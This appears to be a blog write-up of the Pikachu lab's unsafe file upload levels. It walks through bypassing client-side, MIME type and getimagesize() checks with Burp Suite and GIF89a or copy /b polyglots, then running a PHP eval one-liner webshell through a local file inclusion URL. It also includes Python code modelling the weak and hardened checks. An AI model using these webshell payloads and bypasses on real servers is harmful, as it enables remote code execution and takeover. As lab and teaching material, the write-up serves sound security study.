Pikachu-Unsafe Fileupload (unsafe file upload)

Unsafe file upload vulnerability overview

File upload is a common feature of web applications: many sites let a user upload a profile picture when registering, attach files to a form, and so on. When the user clicks the upload button, the back end is supposed to check the file (whether it is of the specified type, extension, size, etc.), then rename it and store it in a directory according to the design. If the back end performs no check on the uploaded file, or the check is not strict enough, an attacker can upload a malicious file such as a PHP one-liner (a "one-sentence Trojan") and obtain a webshell on the server.

So, when designing a file upload function, the uploaded file must be strictly checked. For example:
- verify the file type, extension and size;
- verify the content of the uploaded file, not only its name;
- rename the file with a sufficiently complex (random) name;
- do not expose the storage path after the upload;
- and so on.

Client check

1. Try to upload the PHP one-liner directly; the client-side (JavaScript) check blocks it.

2. Rename the PHP one-liner with an image suffix such as .jpg or .png, upload it again and intercept the request with Burp Suite.

3. In the intercepted request change the .jpg suffix back to .php and forward the packet; the upload succeeds, because the only check ran in the browser.

MIME type

1. Try to upload the PHP one-liner directly; it is rejected.

2. As in the previous level, change the suffix to .jpg, intercept the request, change the suffix back to .php and forward it.

3. This time the upload is rejected: the level is meant to enforce a whitelist, and the hint shows that the check is on the MIME type. That value comes from the request, so it can be modified in the intercepted Burp Suite request and the request re-sent.

Here the Content-Type of the file part is changed to image/jpeg.

Forward the packet; the upload succeeds.
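
Both bypasses above (the client check and the MIME type levels) work because the server trusts fields that the client writes. The following Python is an added example, not Pikachu's code or the post's own: it builds the multipart body a browser would send for the upload form, tampers with it the way Burp Suite does (the filename suffix and the part's Content-Type), and runs the result through a simplified model of each level's check and of the hardened checks the overview recommends. The form field name, boundary string, file names and PHP payload are assumed for illustration; the level checks model the behaviour described above, not Pikachu's actual implementation.

```python
import re
import secrets

# Constructed sample payload: the PHP one-liner ("one-sentence Trojan") the post uploads.
PHP_ONE_LINER = b"<?php @eval($_POST['x']); ?>"

# Constructed sample input: a hand-built, valid 1x1 GIF89a image (35 bytes).
REAL_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
            b",\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;")

BOUNDARY = "----WebKitFormBoundaryEXAMPLE"   # assumed boundary string
FIELD = "uploadfile"                         # assumed form field name


def build_multipart(filename: str, content_type: str, data: bytes) -> bytes:
    """Build the request body a browser sends for the upload form.

    Every header in the part (filename, Content-Type) is written by the
    client, which is exactly what Burp Suite lets the attacker rewrite.
    """
    lines = [
        f"--{BOUNDARY}".encode(),
        f'Content-Disposition: form-data; name="{FIELD}"; filename="{filename}"'.encode(),
        f"Content-Type: {content_type}".encode(),
        b"",
        data,
        f"--{BOUNDARY}--".encode(),
        b"",
    ]
    return b"\r\n".join(lines)


def parse_multipart(body: bytes) -> dict:
    """Server side: minimal single-part parser returning what $_FILES would expose."""
    part = body.split(f"--{BOUNDARY}".encode())[1]
    headers, _, content = part.partition(b"\r\n\r\n")
    content = content.rsplit(b"\r\n", 1)[0]          # drop the CRLF before the closing boundary
    filename = re.search(rb'filename="([^"]*)"', headers).group(1).decode()
    ctype = re.search(rb"Content-Type: ([^\r\n]+)", headers).group(1).decode()
    return {"filename": filename, "content_type": ctype, "data": content}


ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}
ALLOWED_MIME = {"image/jpeg", "image/png", "image/gif"}
MAGIC = {b"\xff\xd8\xff": "jpg", b"\x89PNG\r\n\x1a\n": "png", b"GIF87a": "gif", b"GIF89a": "gif"}


def check_client_only(part: dict) -> bool:
    """Models the 'client check' level: the only filter is JavaScript in the
    browser, so anything that reaches the server is accepted."""
    return True


def check_mime_type(part: dict) -> bool:
    """Models the 'MIME type' level: whitelist applied to the client-supplied Content-Type."""
    return part["content_type"] in ALLOWED_MIME


def check_hardened(part: dict, max_bytes: int = 50 * 1024):
    """The overview's recommendations: whitelist the extension, require magic
    bytes that agree with it, cap the size, and store under an opaque random
    name (the original name and the path are never returned to the client)."""
    name = part["filename"]
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    if ext not in ALLOWED_EXT or len(part["data"]) > max_bytes:
        return None
    sniffed = next((t for sig, t in MAGIC.items() if part["data"].startswith(sig)), None)
    if sniffed is None or sniffed != ("jpg" if ext == "jpeg" else ext):
        return None
    return f"{secrets.token_hex(16)}.{sniffed}"


def run_scenarios() -> dict:
    """Replay the post's two bypasses and one legitimate upload against each check."""
    scenarios = {
        # client check, step 3: suffix changed back to .php in the intercepted request
        "suffix_php": build_multipart("shell.php", "application/octet-stream", PHP_ONE_LINER),
        # MIME type level: keep .php, forge Content-Type: image/jpeg in Burp Suite
        "forged_mime": build_multipart("shell.php", "image/jpeg", PHP_ONE_LINER),
        "legit_gif": build_multipart("avatar.gif", "image/gif", REAL_GIF),
    }
    results = {}
    for label, body in scenarios.items():
        part = parse_multipart(body)
        results[label] = {
            "client_check": check_client_only(part),
            "mime_type": check_mime_type(part),
            "hardened": check_hardened(part) is not None,
        }
    return results


if __name__ == "__main__":
    for label, verdicts in run_scenarios().items():
        print(label, verdicts)
```

The forged Content-Type passes the MIME type model while the renamed-back .php passes the client-only model; neither passes the hardened check, which keys on the extension and on bytes in the file rather than on anything the request claims about itself.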


getimagesize

1. This level also checks the MIME type, but that is the minor part. Looking at the code, it calls getimagesize() to read the image information and verify that the upload is a real picture, limits the upload size to at most 50KB, and renames the file after the upload.

2. First modify the Trojan file: prepend GIF89a to the file so that getimagesize() is fooled, or merge a real picture with the PHP file from the Windows DOS prompt (copy /b picture.jpg + shell.php out.jpg).

 

3. Use the local file inclusion vulnerability, include.php?filename=../../unsafeupload/uploads/2020/02/22/2455306d6b5aec7d419826309450.jpg, to run the Trojan.
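
To see why the two tricks in step 2 defeat getimagesize(), and what a stricter check looks like, here is an added Python example (not Pikachu's or the post's code). It builds both the GIF89a-prefixed one-liner and the image-plus-PHP concatenation, runs them through a small port of the GIF header parsing PHP performs in getimagesize() (sniff 3 bytes, skip 3, read width and height), and then through a structural walk of the GIF that insists the file end exactly at the trailer byte. The sample image and payload are constructed; the getimagesize() port follows PHP's ext/standard/image.c for the GIF case only.

```python
import struct

# Constructed sample payload (the same one-liner the post uploads).
PHP_ONE_LINER = b"<?php @eval($_POST['x']); ?>"

# Constructed sample input: a hand-built, valid 1x1 GIF89a image (35 bytes).
REAL_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
            b",\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;")


def gif89a_prefix(payload: bytes) -> bytes:
    """Variant 1 from step 2: prepend the six-byte GIF signature to the PHP file."""
    return b"GIF89a" + payload


def concat_image(image: bytes, payload: bytes) -> bytes:
    """Variant 2 from step 2: what `copy /b real.gif + shell.php out.jpg` produces on Windows."""
    return image + payload


def getimagesize_gif(data: bytes):
    """Port of the GIF path of PHP's getimagesize(): php_getimagetype() sniffs
    the first 3 bytes ("GIF"), php_handle_gif() then skips 3 more and reads 5
    header bytes (little-endian width and height, then packed flags).
    Returns (width, height, mime), or None where PHP returns false."""
    if len(data) < 11 or data[:3] != b"GIF":
        return None
    width, height = struct.unpack("<HH", data[6:10])
    return (width, height, "image/gif")


def gif_is_well_formed(data: bytes) -> bool:
    """Stricter check: walk the GIF block structure and require the file to end
    exactly at the trailer byte (0x3B). Bogus headers and appended data fail."""
    if data[:6] not in (b"GIF87a", b"GIF89a") or len(data) < 13:
        return False

    def skip_sub_blocks(p):
        # data sub-blocks: <len><bytes>... terminated by a zero-length block
        while p < len(data):
            n = data[p]
            p += 1
            if n == 0:
                return p
            p += n
        return None

    pos = 13
    if data[10] & 0x80:                          # global color table present
        pos += 3 * (2 << (data[10] & 0x07))
    while pos < len(data):
        block = data[pos]
        pos += 1
        if block == 0x3B:                        # trailer: must be the last byte
            return pos == len(data)
        if block == 0x2C:                        # image descriptor: 9 bytes + optional LCT
            if pos + 9 > len(data):
                return False
            lct = data[pos + 8]
            pos += 9
            if lct & 0x80:
                pos += 3 * (2 << (lct & 0x07))
            pos = skip_sub_blocks(pos + 1)       # +1 skips the LZW minimum code size
        elif block == 0x21:                      # extension: label byte, then sub-blocks
            pos = skip_sub_blocks(pos + 1)
        else:
            return False
        if pos is None:
            return False
    return False


def contains_php_tag(data: bytes) -> bool:
    """Cheap content scan: a real image has no reason to contain a PHP open tag."""
    return b"<?php" in data or b"<?=" in data


def evaluate(data: bytes) -> dict:
    """Run one candidate upload through the weak check and the two stricter ones."""
    return {
        "getimagesize": getimagesize_gif(data),
        "well_formed": gif_is_well_formed(data),
        "php_tag": contains_php_tag(data),
    }


if __name__ == "__main__":
    for label, blob in [("real", REAL_GIF),
                        ("prefix", gif89a_prefix(PHP_ONE_LINER)),
                        ("concat", concat_image(REAL_GIF, PHP_ONE_LINER))]:
        print(label, evaluate(blob))
```

getimagesize() never looks past the header, so both polyglots report as GIFs (the prefixed one with garbage dimensions taken from the bytes of "<?ph"); the structural walk rejects both, and the tag scan flags both. Note that once an include.php?filename=... local file inclusion exists, as in step 3, the stored .jpg extension and the rename give no protection at all: include() executes whatever PHP is in the file, so the inclusion bug has to be fixed along with the upload check.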



Origin www.cnblogs.com/joker-vip/p/12355132.html